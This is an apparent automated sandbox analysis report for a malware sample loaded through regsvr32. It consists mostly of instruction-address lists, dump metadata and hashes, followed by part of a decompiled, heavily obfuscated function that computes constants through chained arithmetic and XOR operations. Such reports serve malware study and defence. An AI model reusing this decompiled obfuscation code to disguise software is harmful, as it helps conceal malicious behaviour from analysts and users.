                                                                                                                0x001a527e
                                                                                                                0x001a5289
                                                                                                                0x001a5294
                                                                                                                0x001a52a7
                                                                                                                0x001a52ae
                                                                                                                0x001a52b6
                                                                                                                0x001a52c1
                                                                                                                0x001a52cc
                                                                                                                0x001a52d7
                                                                                                                0x001a52e2
                                                                                                                0x001a52ed
                                                                                                                0x001a52f8
                                                                                                                0x001a5303
                                                                                                                0x001a530e
                                                                                                                0x001a5327
                                                                                                                0x001a532f
                                                                                                                0x001a533a
                                                                                                                0x001a5345
                                                                                                                0x001a5359
                                                                                                                0x001a535e
                                                                                                                0x001a5367
                                                                                                                0x001a5372
                                                                                                                0x001a537d
                                                                                                                0x001a5389
                                                                                                                0x001a538e
                                                                                                                0x001a5394
                                                                                                                0x001a53a0
                                                                                                                0x001a53a5
                                                                                                                0x001a53ab
                                                                                                                0x001a53b3
                                                                                                                0x001a53be
                                                                                                                0x001a53c9
                                                                                                                0x001a53d4
                                                                                                                0x001a53df
                                                                                                                0x001a53ea
                                                                                                                0x001a53f5
                                                                                                                0x001a5400
                                                                                                                0x001a540b
                                                                                                                0x001a5412
                                                                                                                0x001a541d
                                                                                                                0x001a5428
                                                                                                                0x001a5430
                                                                                                                0x001a543b
                                                                                                                0x001a5448
                                                                                                                0x001a544b
                                                                                                                0x001a544f
                                                                                                                0x001a545d
                                                                                                                0x001a545e
                                                                                                                0x001a5464
                                                                                                                0x001a546c
                                                                                                                0x001a5477
                                                                                                                0x001a5482
                                                                                                                0x001a548d
                                                                                                                0x001a549d
                                                                                                                0x001a54a6
                                                                                                                0x001a54ae
                                                                                                                0x001a54b6
                                                                                                                0x001a54c1
                                                                                                                0x001a54cd
                                                                                                                0x001a54d2
                                                                                                                0x001a54d6
                                                                                                                0x001a54de
                                                                                                                0x001a54e6
                                                                                                                0x001a54ee
                                                                                                                0x001a54f9
                                                                                                                0x001a5504
                                                                                                                0x001a550c
                                                                                                                0x001a5517
                                                                                                                0x001a5522
                                                                                                                0x001a552d
                                                                                                                0x001a5535
                                                                                                                0x001a5540
                                                                                                                0x001a5548
                                                                                                                0x001a5556
                                                                                                                0x001a555b
                                                                                                                0x001a555f
                                                                                                                0x001a5567
                                                                                                                0x001a557c
                                                                                                                0x001a557f
                                                                                                                0x001a5586
                                                                                                                0x001a558d
                                                                                                                0x001a5598
                                                                                                                0x001a55ae
                                                                                                                0x001a55b5
                                                                                                                0x001a55c0
                                                                                                                0x001a55cb
                                                                                                                0x001a55d6
                                                                                                                0x001a55e1
                                                                                                                0x001a55ee
                                                                                                                0x001a55f1
                                                                                                                0x001a55f5
                                                                                                                0x001a55fd
                                                                                                                0x001a5605
                                                                                                                0x001a560d
                                                                                                                0x001a5618
                                                                                                                0x001a5623
                                                                                                                0x001a562e
                                                                                                                0x001a5639
                                                                                                                0x001a564f
                                                                                                                0x001a5656
                                                                                                                0x001a5661
                                                                                                                0x001a5669
                                                                                                                0x001a5671
                                                                                                                0x001a5679
                                                                                                                0x001a5681
                                                                                                                0x001a5686
                                                                                                                0x001a568a
                                                                                                                0x001a5692
                                                                                                                0x001a569d
                                                                                                                0x001a56a8
                                                                                                                0x001a56b3
                                                                                                                0x001a56bb
                                                                                                                0x001a56ca
                                                                                                                0x001a56cd
                                                                                                                0x001a56d6
                                                                                                                0x001a56da
                                                                                                                0x001a56e2
                                                                                                                0x001a56f8
                                                                                                                0x001a570a
                                                                                                                0x001a5711
                                                                                                                0x001a571c
                                                                                                                0x001a572e
                                                                                                                0x001a5731
                                                                                                                0x001a5738
                                                                                                                0x001a5743
                                                                                                                0x001a574e
                                                                                                                0x001a5759
                                                                                                                0x001a5764
                                                                                                                0x001a5771
                                                                                                                0x001a577c
                                                                                                                0x001a5787
                                                                                                                0x001a579b
                                                                                                                0x001a57a0
                                                                                                                0x001a57a9
                                                                                                                0x001a57b4
                                                                                                                0x001a57bf
                                                                                                                0x001a57ca
                                                                                                                0x001a57d2
                                                                                                                0x001a57e4
                                                                                                                0x001a57e9
                                                                                                                0x001a57f2
                                                                                                                0x001a57fd
                                                                                                                0x001a5805
                                                                                                                0x001a580d
                                                                                                                0x001a5815
                                                                                                                0x001a581d
                                                                                                                0x001a5825
                                                                                                                0x001a5830
                                                                                                                0x001a5843
                                                                                                                0x001a5844
                                                                                                                0x001a584b
                                                                                                                0x001a5856
                                                                                                                0x001a5861
                                                                                                                0x001a5875
                                                                                                                0x001a587c
                                                                                                                0x001a5887
                                                                                                                0x001a5892
                                                                                                                0x001a589a
                                                                                                                0x001a58a5
                                                                                                                0x001a58b0
                                                                                                                0x001a58bb
                                                                                                                0x001a58c6
                                                                                                                0x001a58d1
                                                                                                                0x001a58dc
                                                                                                                0x001a58e7
                                                                                                                0x001a58ef
                                                                                                                0x001a58fa
                                                                                                                0x001a590d
                                                                                                                0x001a5914
                                                                                                                0x001a591f
                                                                                                                0x001a592a
                                                                                                                0x001a5935
                                                                                                                0x001a5940
                                                                                                                0x001a594b
                                                                                                                0x001a5956
                                                                                                                0x001a5961
                                                                                                                0x001a596c
                                                                                                                0x001a5974
                                                                                                                0x001a597c
                                                                                                                0x001a5981
                                                                                                                0x001a5989
                                                                                                                0x001a5991
                                                                                                                0x001a599c
                                                                                                                0x001a59a7
                                                                                                                0x001a59b2
                                                                                                                0x001a59bd
                                                                                                                0x001a59c5
                                                                                                                0x001a59ca
                                                                                                                0x001a59d2
                                                                                                                0x001a59da
                                                                                                                0x001a59e2
                                                                                                                0x001a59f5
                                                                                                                0x001a59fc
                                                                                                                0x001a5a07
                                                                                                                0x001a5a14
                                                                                                                0x001a5a1c
                                                                                                                0x001a5a27
                                                                                                                0x001a5a32
                                                                                                                0x001a5a3d
                                                                                                                0x001a5a48
                                                                                                                0x001a5a53
                                                                                                                0x001a5a69
                                                                                                                0x001a5a70
                                                                                                                0x001a5a7b
                                                                                                                0x001a5a86
                                                                                                                0x001a5a91
                                                                                                                0x001a5a9c
                                                                                                                0x001a5aa7
                                                                                                                0x001a5ab2
                                                                                                                0x001a5abd
                                                                                                                0x001a5ad1
                                                                                                                0x001a5ad6
                                                                                                                0x001a5add
                                                                                                                0x001a5ae8
                                                                                                                0x001a5af3
                                                                                                                0x001a5afe
                                                                                                                0x001a5b09
                                                                                                                0x001a5b14
                                                                                                                0x001a5b1f
                                                                                                                0x001a5b27
                                                                                                                0x001a5b32
                                                                                                                0x001a5b3a
                                                                                                                0x001a5b4a
                                                                                                                0x001a5b50
                                                                                                                0x001a5b58
                                                                                                                0x001a5b60
                                                                                                                0x001a5b6b
                                                                                                                0x001a5b7a
                                                                                                                0x001a5b7f
                                                                                                                0x001a5b88
                                                                                                                0x001a5b93
                                                                                                                0x001a5b9e
                                                                                                                0x001a5ba9
                                                                                                                0x001a5bb4
                                                                                                                0x001a5bbf
                                                                                                                0x001a5bca
                                                                                                                0x001a5bd5
                                                                                                                0x001a5be0
                                                                                                                0x001a5beb
                                                                                                                0x001a5bf3
                                                                                                                0x001a5bfe
                                                                                                                0x001a5c09
                                                                                                                0x001a5c10
                                                                                                                0x001a5c13
                                                                                                                0x001a5c1a
                                                                                                                0x001a5c22
                                                                                                                0x001a5c2d
                                                                                                                0x001a5c38
                                                                                                                0x001a5c4b
                                                                                                                0x001a5c52
                                                                                                                0x001a5c5d
                                                                                                                0x001a5c68
                                                                                                                0x001a5c70
                                                                                                                0x001a5c7d
                                                                                                                0x001a5c91
                                                                                                                0x001a5c96
                                                                                                                0x001a5c9f
                                                                                                                0x001a5caa
                                                                                                                0x001a5cb5
                                                                                                                0x001a5cc0
                                                                                                                0x001a5ccb
                                                                                                                0x001a5cd6
                                                                                                                0x001a5cde
                                                                                                                0x001a5ce6
                                                                                                                0x001a5cee
                                                                                                                0x001a5cf3
                                                                                                                0x001a5cfb
                                                                                                                0x001a5d03
                                                                                                                0x001a5d10
                                                                                                                0x001a5d13
                                                                                                                0x001a5d17
                                                                                                                0x001a5d1f
                                                                                                                0x001a5d27
                                                                                                                0x001a5d32
                                                                                                                0x001a5d3d
                                                                                                                0x001a5d48
                                                                                                                0x001a5d50
                                                                                                                0x001a5d58
                                                                                                                0x001a5d60
                                                                                                                0x001a5d68
                                                                                                                0x001a5d70
                                                                                                                0x001a5d78
                                                                                                                0x001a5d7d
                                                                                                                0x001a5d85
                                                                                                                0x001a5d8d
                                                                                                                0x001a5d95
                                                                                                                0x001a5d9d
                                                                                                                0x001a5da5
                                                                                                                0x001a5dad
                                                                                                                0x001a5db5
                                                                                                                0x001a5dc0
                                                                                                                0x001a5dc8
                                                                                                                0x001a5dd0
                                                                                                                0x001a5ddb
                                                                                                                0x001a5df1
                                                                                                                0x001a5e00
                                                                                                                0x001a5e03
                                                                                                                0x001a5e0a
                                                                                                                0x001a5e15
                                                                                                                0x001a5e20
                                                                                                                0x001a5e28
                                                                                                                0x001a5e33
                                                                                                                0x001a5e3e
                                                                                                                0x001a5e49
                                                                                                                0x001a5e54
                                                                                                                0x001a5e5f
                                                                                                                0x001a5e72
                                                                                                                0x001a5e84
                                                                                                                0x001a5e8b
                                                                                                                0x001a5e93
                                                                                                                0x001a5e9e
                                                                                                                0x001a5ea9
                                                                                                                0x001a5eb0
                                                                                                                0x001a5ebb
                                                                                                                0x001a5ec6
                                                                                                                0x001a5ed2
                                                                                                                0x001a5ed5
                                                                                                                0x001a5ed9
                                                                                                                0x001a5ee1
                                                                                                                0x001a5eeb
                                                                                                                0x001a5ef3
                                                                                                                0x001a5efe
                                                                                                                0x001a5f09
                                                                                                                0x001a5f14
                                                                                                                0x001a5f1f
                                                                                                                0x001a5f27
                                                                                                                0x001a5f35
                                                                                                                0x001a5f3a
                                                                                                                0x001a5f45
                                                                                                                0x001a5f46
                                                                                                                0x001a5f4a
                                                                                                                0x001a5f52
                                                                                                                0x001a5f5d
                                                                                                                0x001a5f68
                                                                                                                0x001a5f73
                                                                                                                0x001a5f7e
                                                                                                                0x001a5f89
                                                                                                                0x001a5f94
                                                                                                                0x001a5f9c
                                                                                                                0x001a5fa4
                                                                                                                0x001a5fa9
                                                                                                                0x001a5fb1
                                                                                                                0x001a5fb9
                                                                                                                0x001a5fc4
                                                                                                                0x001a5fcc
                                                                                                                0x001a5fd7
                                                                                                                0x001a5fe2
                                                                                                                0x001a5fed
                                                                                                                0x001a5ff5
                                                                                                                0x001a5ffd
                                                                                                                0x001a6008
                                                                                                                0x001a6013
                                                                                                                0x001a601e
                                                                                                                0x001a6029
                                                                                                                0x001a6034
                                                                                                                0x001a603f
                                                                                                                0x001a604d
                                                                                                                0x001a6051
                                                                                                                0x001a6059
                                                                                                                0x001a6061
                                                                                                                0x001a6069
                                                                                                                0x001a6074
                                                                                                                0x001a6087
                                                                                                                0x001a608e
                                                                                                                0x001a6099
                                                                                                                0x001a60a1
                                                                                                                0x001a60a9
                                                                                                                0x001a60b2
                                                                                                                0x001a60b6
                                                                                                                0x001a60be
                                                                                                                0x001a60c9
                                                                                                                0x001a60d1
                                                                                                                0x001a60dc
                                                                                                                0x001a60e7
                                                                                                                0x001a60f2
                                                                                                                0x001a60fd
                                                                                                                0x001a6110
                                                                                                                0x001a6117
                                                                                                                0x001a6122
                                                                                                                0x001a612d
                                                                                                                0x001a6138
                                                                                                                0x001a6143
                                                                                                                0x001a615c
                                                                                                                0x001a6167
                                                                                                                0x001a6172
                                                                                                                0x001a6189
                                                                                                                0x001a6196
                                                                                                                0x001a619d
                                                                                                                0x001a61a4
                                                                                                                0x001a61ac
                                                                                                                0x001a61b7
                                                                                                                0x001a61cb
                                                                                                                0x001a61d2
                                                                                                                0x001a61da
                                                                                                                0x001a61e5
                                                                                                                0x001a61f0
                                                                                                                0x001a61fb
                                                                                                                0x001a6206
                                                                                                                0x001a6211
                                                                                                                0x001a621c
                                                                                                                0x001a6227
                                                                                                                0x001a6232
                                                                                                                0x001a623d
                                                                                                                0x001a6248
                                                                                                                0x001a6253
                                                                                                                0x001a625e
                                                                                                                0x001a6269
                                                                                                                0x001a6274
                                                                                                                0x001a627f
                                                                                                                0x001a628a
                                                                                                                0x001a6295
                                                                                                                0x001a62a0
                                                                                                                0x001a62a8
                                                                                                                0x001a62b0
                                                                                                                0x001a62b8
                                                                                                                0x001a62c0
                                                                                                                0x001a62c8
                                                                                                                0x001a62d0
                                                                                                                0x001a62d8
                                                                                                                0x001a62e0
                                                                                                                0x001a62e8
                                                                                                                0x001a62f0
                                                                                                                0x001a62fb
                                                                                                                0x001a6303
                                                                                                                0x001a630e
                                                                                                                0x001a6319
                                                                                                                0x001a6324
                                                                                                                0x001a632c
                                                                                                                0x001a6334
                                                                                                                0x001a633f
                                                                                                                0x001a6352
                                                                                                                0x001a6359
                                                                                                                0x001a6364
                                                                                                                0x001a636f
                                                                                                                0x001a637a
                                                                                                                0x001a6382
                                                                                                                0x001a6382
                                                                                                                0x001a638d
                                                                                                                0x001a638d
                                                                                                                0x001a638d
                                                                                                                0x001a638d
                                                                                                                0x001a6393
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a6817
                                                                                                                0x001a681d
                                                                                                                0x001a6a2e
                                                                                                                0x001a6a34
                                                                                                                0x001a6bdb
                                                                                                                0x001a6be1
                                                                                                                0x001a6c2f
                                                                                                                0x001a6c34
                                                                                                                0x001a6c35
                                                                                                                0x00000000
                                                                                                                0x001a6c35
                                                                                                                0x001a6be3
                                                                                                                0x001a6be9
                                                                                                                0x001a6c12
                                                                                                                0x001a6c17
                                                                                                                0x00000000
                                                                                                                0x001a6c17
                                                                                                                0x001a6beb
                                                                                                                0x001a6bf1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a6bf3
                                                                                                                0x001a6bfa
                                                                                                                0x001a6bff
                                                                                                                0x00000000
                                                                                                                0x001a6bff
                                                                                                                0x001a6a3a
                                                                                                                0x001a6b1f
                                                                                                                0x001a6b49
                                                                                                                0x001a6b6c
                                                                                                                0x001a6b91
                                                                                                                0x001a6ba0
                                                                                                                0x001a6ba6
                                                                                                                0x001a6bca
                                                                                                                0x001a6bd1
                                                                                                                0x001a6bd6
                                                                                                                0x00000000
                                                                                                                0x001a6bd6
                                                                                                                0x001a6a40
                                                                                                                0x001a6a46
                                                                                                                0x001a6aea
                                                                                                                0x001a6aef
                                                                                                                0x00000000
                                                                                                                0x001a6aef
                                                                                                                0x001a6a4c
                                                                                                                0x001a6a52
                                                                                                                0x001a6aae
                                                                                                                0x001a6ac4
                                                                                                                0x001a6ac9
                                                                                                                0x001a6ad0
                                                                                                                0x001a6ad8
                                                                                                                0x00000000
                                                                                                                0x001a6ad8
                                                                                                                0x001a6a54
                                                                                                                0x001a6a5a
                                                                                                                0x001a6a8a
                                                                                                                0x001a6a8f
                                                                                                                0x00000000
                                                                                                                0x001a6a8f
                                                                                                                0x001a6a5c
                                                                                                                0x001a6a62
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a6a6f
                                                                                                                0x001a6a74
                                                                                                                0x001a6a76
                                                                                                                0x001a6c69
                                                                                                                0x001a6c70
                                                                                                                0x001a6c70
                                                                                                                0x001a6a7c
                                                                                                                0x00000000
                                                                                                                0x001a6a7c
                                                                                                                0x001a6823
                                                                                                                0x001a6c64
                                                                                                                0x00000000
                                                                                                                0x001a6c64
                                                                                                                0x001a6829
                                                                                                                0x001a682f
                                                                                                                0x001a6975
                                                                                                                0x001a697b
                                                                                                                0x001a6a18
                                                                                                                0x001a6a21
                                                                                                                0x001a6a23
                                                                                                                0x001a6625
                                                                                                                0x001a6625
                                                                                                                0x00000000
                                                                                                                0x001a6625
                                                                                                                0x001a6981
                                                                                                                0x001a6987
                                                                                                                0x001a6a00
                                                                                                                0x00000000
                                                                                                                0x001a6a00
                                                                                                                0x001a6989
                                                                                                                0x001a698f
                                                                                                                0x001a69e1
                                                                                                                0x001a69e8
                                                                                                                0x001a69ee
                                                                                                                0x001a69ef
                                                                                                                0x001a69f6
                                                                                                                0x00000000
                                                                                                                0x001a69f6
                                                                                                                0x001a6991
                                                                                                                0x001a6997
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a69ab
                                                                                                                0x001a69b0
                                                                                                                0x001a69b2
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a69b8
                                                                                                                0x00000000
                                                                                                                0x001a69b8
                                                                                                                0x001a6835
                                                                                                                0x001a6950
                                                                                                                0x001a6955
                                                                                                                0x001a6957
                                                                                                                0x001a696b
                                                                                                                0x001a696b
                                                                                                                0x001a68b0
                                                                                                                0x001a68b0
                                                                                                                0x00000000
                                                                                                                0x001a68b0
                                                                                                                0x001a683b
                                                                                                                0x001a6841
                                                                                                                0x001a693d
                                                                                                                0x001a6942
                                                                                                                0x00000000
                                                                                                                0x001a6942
                                                                                                                0x001a6847
                                                                                                                0x001a684d
                                                                                                                0x001a6923
                                                                                                                0x001a6928
                                                                                                                0x00000000
                                                                                                                0x001a6928
                                                                                                                0x001a6853
                                                                                                                0x001a6855
                                                                                                                0x001a68e7
                                                                                                                0x001a6903
                                                                                                                0x001a6908
                                                                                                                0x001a690b
                                                                                                                0x00000000
                                                                                                                0x001a690b
                                                                                                                0x001a685b
                                                                                                                0x001a6861
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a687e
                                                                                                                0x001a6884
                                                                                                                0x001a6885
                                                                                                                0x001a6887
                                                                                                                0x001a68ba
                                                                                                                0x001a68c1
                                                                                                                0x001a68c4
                                                                                                                0x001a68d0
                                                                                                                0x001a68d2
                                                                                                                0x001a68d9
                                                                                                                0x001a68d9
                                                                                                                0x00000000
                                                                                                                0x001a68d9
                                                                                                                0x001a68d4
                                                                                                                0x001a68d7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a68d7
                                                                                                                0x001a68c6
                                                                                                                0x00000000
                                                                                                                0x001a68c6
                                                                                                                0x001a6898
                                                                                                                0x001a68a4
                                                                                                                0x001a68a9
                                                                                                                0x001a68ac
                                                                                                                0x001a68ae
                                                                                                                0x00000000
                                                                                                                0x001a68ae
                                                                                                                0x001a6399
                                                                                                                0x001a6806
                                                                                                                0x001a680d
                                                                                                                0x00000000
                                                                                                                0x001a680d
                                                                                                                0x001a639f
                                                                                                                0x001a63a5
                                                                                                                0x001a6653
                                                                                                                0x001a6659
                                                                                                                0x001a6741
                                                                                                                0x001a6747
                                                                                                                0x001a67de
                                                                                                                0x001a67e7
                                                                                                                0x001a67ef
                                                                                                                0x00000000
                                                                                                                0x001a67ef
                                                                                                                0x001a674d
                                                                                                                0x001a6753
                                                                                                                0x001a67cc
                                                                                                                0x001a67d1
                                                                                                                0x001a6737
                                                                                                                0x001a6737
                                                                                                                0x00000000
                                                                                                                0x001a6737
                                                                                                                0x001a6755
                                                                                                                0x001a675b
                                                                                                                0x001a678f
                                                                                                                0x001a679b
                                                                                                                0x001a67a4
                                                                                                                0x001a67ac
                                                                                                                0x00000000
                                                                                                                0x001a67ac
                                                                                                                0x001a675d
                                                                                                                0x001a6763
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a6774
                                                                                                                0x001a6779
                                                                                                                0x001a677b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a6781
                                                                                                                0x00000000
                                                                                                                0x001a6781
                                                                                                                0x001a665f
                                                                                                                0x001a6702
                                                                                                                0x001a670b
                                                                                                                0x001a671e
                                                                                                                0x001a672d
                                                                                                                0x001a6732
                                                                                                                0x001a6735
                                                                                                                0x00000000
                                                                                                                0x001a6735
                                                                                                                0x001a6665
                                                                                                                0x001a666b
                                                                                                                0x001a66e5
                                                                                                                0x001a66ea
                                                                                                                0x00000000
                                                                                                                0x001a66ea
                                                                                                                0x001a666d
                                                                                                                0x001a6673
                                                                                                                0x001a66ca
                                                                                                                0x001a66cf
                                                                                                                0x001a66d1
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a66d7
                                                                                                                0x00000000
                                                                                                                0x001a66d7
                                                                                                                0x001a6675
                                                                                                                0x001a667b
                                                                                                                0x001a66b4
                                                                                                                0x001a66b9
                                                                                                                0x00000000
                                                                                                                0x001a66b9
                                                                                                                0x001a667d
                                                                                                                0x001a6683
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a6697
                                                                                                                0x001a669c
                                                                                                                0x001a66a3
                                                                                                                0x00000000
                                                                                                                0x001a66a3
                                                                                                                0x001a63ab
                                                                                                                0x001a6609
                                                                                                                0x001a660b
                                                                                                                0x001a6637
                                                                                                                0x001a6640
                                                                                                                0x001a6648
                                                                                                                0x00000000
                                                                                                                0x001a6648
                                                                                                                0x001a6614
                                                                                                                0x001a661d
                                                                                                                0x001a661f
                                                                                                                0x001a661f
                                                                                                                0x00000000
                                                                                                                0x001a661f
                                                                                                                0x001a63b1
                                                                                                                0x001a63b7
                                                                                                                0x001a6456
                                                                                                                0x001a645c
                                                                                                                0x001a65ee
                                                                                                                0x001a65f3
                                                                                                                0x00000000
                                                                                                                0x001a65f3
                                                                                                                0x001a6462
                                                                                                                0x001a6468
                                                                                                                0x001a6556
                                                                                                                0x001a655c
                                                                                                                0x001a655d
                                                                                                                0x001a655f
                                                                                                                0x001a656a
                                                                                                                0x001a6571
                                                                                                                0x001a6573
                                                                                                                0x001a658a
                                                                                                                0x001a659b
                                                                                                                0x001a659d
                                                                                                                0x001a65a0
                                                                                                                0x001a65a0
                                                                                                                0x001a65a7
                                                                                                                0x001a65aa
                                                                                                                0x001a65be
                                                                                                                0x001a65cd
                                                                                                                0x001a65d2
                                                                                                                0x001a65d5
                                                                                                                0x001a6561
                                                                                                                0x001a6561
                                                                                                                0x001a6561
                                                                                                                0x001a65d7
                                                                                                                0x001a65d9
                                                                                                                0x00000000
                                                                                                                0x001a65d9
                                                                                                                0x001a646e
                                                                                                                0x001a6474
                                                                                                                0x001a64e0
                                                                                                                0x001a64e4
                                                                                                                0x001a6536
                                                                                                                0x001a6536
                                                                                                                0x00000000
                                                                                                                0x001a6536
                                                                                                                0x001a64fd
                                                                                                                0x001a6512
                                                                                                                0x001a6517
                                                                                                                0x001a651a
                                                                                                                0x001a651e
                                                                                                                0x001a6531
                                                                                                                0x00000000
                                                                                                                0x001a6531
                                                                                                                0x001a6520
                                                                                                                0x00000000
                                                                                                                0x001a6520
                                                                                                                0x001a6476
                                                                                                                0x001a647c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a6490
                                                                                                                0x001a64ba
                                                                                                                0x001a64c1
                                                                                                                0x001a64c6
                                                                                                                0x001a64cd
                                                                                                                0x001a64d5
                                                                                                                0x00000000
                                                                                                                0x001a64d5
                                                                                                                0x001a63bd
                                                                                                                0x001a6446
                                                                                                                0x001a644b
                                                                                                                0x001a644c
                                                                                                                0x00000000
                                                                                                                0x001a644c
                                                                                                                0x001a63c5
                                                                                                                0x001a641d
                                                                                                                0x001a6422
                                                                                                                0x001a6424
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x001a642a
                                                                                                                0x00000000
                                                                                                                0x001a642a
                                                                                                                0x001a63cd
                                                                                                                0x001a6400
                                                                                                                0x001a6405
                                                                                                                0x001a640c
                                                                                                                0x00000000
                                                                                                                0x001a640c
                                                                                                                0x001a63d5
                                                                                                                0x001a6c4f
                                                                                                                0x00000000
                                                                                                                0x001a6c4f
                                                                                                                0x001a63e1
                                                                                                                0x001a63e7
                                                                                                                0x001a63ee
                                                                                                                0x001a63f0
                                                                                                                0x00000000
                                                                                                                0x001a63f0
                                                                                                                0x001a6c3a
                                                                                                                0x001a6c3a
                                                                                                                0x001a6c3a
                                                                                                                0x00000000

                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.435268033.00000000001A1000.00000020.00000800.00020000.00000000.sdmp, Offset: 001A0000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.435262466.00000000001A0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.435424973.00000000001C4000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_1a0000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: Oj$"'$"T$&G+$'\$(n[$6]$8#B$:_$:mNi$>u$Cf$OTLr$Q|?4$X@$\me$_$$`$iQ\$k*$lA$l}$q~$sC6$tZw$vx$xNEa$xO$~<N$~/\$E$[
                                                                                                                • API String ID: 0-2492860842
                                                                                                                • Opcode ID: 1f65fd24131b639c9fbccfe713c922423b0442757d68f2181b3e34190afbcf77
                                                                                                                • Instruction ID: a3fbe4df508783abd7465c7acff61b9d2d3a76b29266d254c1355050586a27cb
                                                                                                                • Opcode Fuzzy Hash: 1f65fd24131b639c9fbccfe713c922423b0442757d68f2181b3e34190afbcf77
                                                                                                                • Instruction Fuzzy Hash: 30D221769083808BD379CF25C48ABCBBBE1BB95318F14891DE5DD96260DBB09949CF43
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 001A364E Relevance: 11.6, Strings: 9, Instructions: 371COMMONCrypto
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 333 1a364e-1a3b46 call 1ac98a 336 1a3b4d 333->336 337 1a3b52-1a3b58 336->337 338 1a3b5e 337->338 339 1a3cc7-1a3ccd 337->339 340 1a3c83-1a3c9c call 1a8e38 338->340 341 1a3b64-1a3b6a 338->341 342 1a3dc3-1a3dd2 call 1b17d2 339->342 343 1a3cd3-1a3cd9 339->343 357 1a3ca1-1a3cc2 340->357 346 1a3b70-1a3b76 341->346 347 1a3c67-1a3c7e call 1b17d2 341->347 358 1a3dd7-1a3ddb 342->358 344 1a3d8e-1a3dab call 1a303a 343->344 345 1a3cdf-1a3ce5 343->345 365 1a3db0-1a3db7 344->365 351 1a3ceb-1a3cf2 345->351 352 1a3d76-1a3d89 345->352 353 1a3c3b-1a3c5a call 1b640e 346->353 354 1a3b7c-1a3b7e 346->354 372 1a3bce 347->372 359 1a3cf8-1a3d42 call 1a32b3 351->359 360 1a3de0-1a3dea 351->360 352->337 376 1a3c5d-1a3c62 353->376 362 1a3bdb-1a3c36 call 1acd1c call 1bed7b 354->362 363 1a3b80-1a3b86 354->363 357->337 358->360 359->376 381 1a3d48-1a3d71 call 1acca2 359->381 360->337 368 1a3df0-1a3dfa 360->368 362->358 370 1a3b9b-1a3bcb call 1a303a 363->370 371 1a3b88-1a3b8e 363->371 365->368 373 1a3db9 365->373 370->372 371->360 377 1a3b94-1a3b99 371->377 379 1a3bd2-1a3bd6 372->379 373->342 376->372 377->337 379->336 381->379
                                                                                                                C-Code - Quality: 64%
                                                                                                                			E001A364E(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v4;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				intOrPtr _v136;
				signed int _v140;
				intOrPtr _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				void* _t326;
				intOrPtr _t360;
				void* _t364;
				signed int _t366;
				intOrPtr _t381;
				intOrPtr _t382;
				void* _t413;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				signed int _t423;
				signed int _t424;
				signed int _t425;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				intOrPtr* _t429;
				signed int _t432;
				intOrPtr _t437;
				signed int* _t439;
				void* _t442;

				_t382 = __ecx;
				_push(_a12);
				_v144 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001AC98A(_t326);
				_v92 = 0x563ef7;
				_t439 =  &(( &_v168)[5]);
				_t381 = 0;
				_t432 = 0x8c861f1;
				_t437 = 0;
				_t420 = 5;
				_v92 = _v92 / _t420;
				_v92 = _v92 + 0xffff6cb7;
				_v92 = _v92 ^ 0x0010ac83;
				_v84 = 0xb18982;
				_v84 = _v84 << 0xe;
				_v84 = _v84 ^ 0x62608001;
				_v104 = 0x3163df;
				_t421 = 0xc;
				_v104 = _v104 * 0x65;
				_v104 = _v104 >> 7;
				_v104 = _v104 ^ 0x0026f8cc;
				_v96 = 0xb92cb6;
				_v96 = _v96 / _t421;
				_v96 = _v96 << 2;
				_v96 = _v96 ^ 0x00336e37;
				_v160 = 0x6b2580;
				_v160 = _v160 + 0xffffebcd;
				_v160 = _v160 ^ 0x7cc2f29f;
				_v160 = _v160 + 0xffff549a;
				_v160 = _v160 ^ 0x7ca177b6;
				_v36 = 0xcce3d4;
				_v36 = _v36 << 8;
				_v36 = _v36 ^ 0xcce5284a;
				_v44 = 0x9577c8;
				_v44 = _v44 | 0x7caf38d4;
				_v44 = _v44 ^ 0x7cb054a6;
				_v124 = 0x7abe29;
				_v124 = _v124 + 0xffffa965;
				_v124 = _v124 | 0x1a7de5c5;
				_v124 = _v124 ^ 0x1a70ba68;
				_v88 = 0x8c9916;
				_t422 = 0x6f;
				_v88 = _v88 * 0x79;
				_v88 = _v88 / _t422;
				_v88 = _v88 ^ 0x009aa8f8;
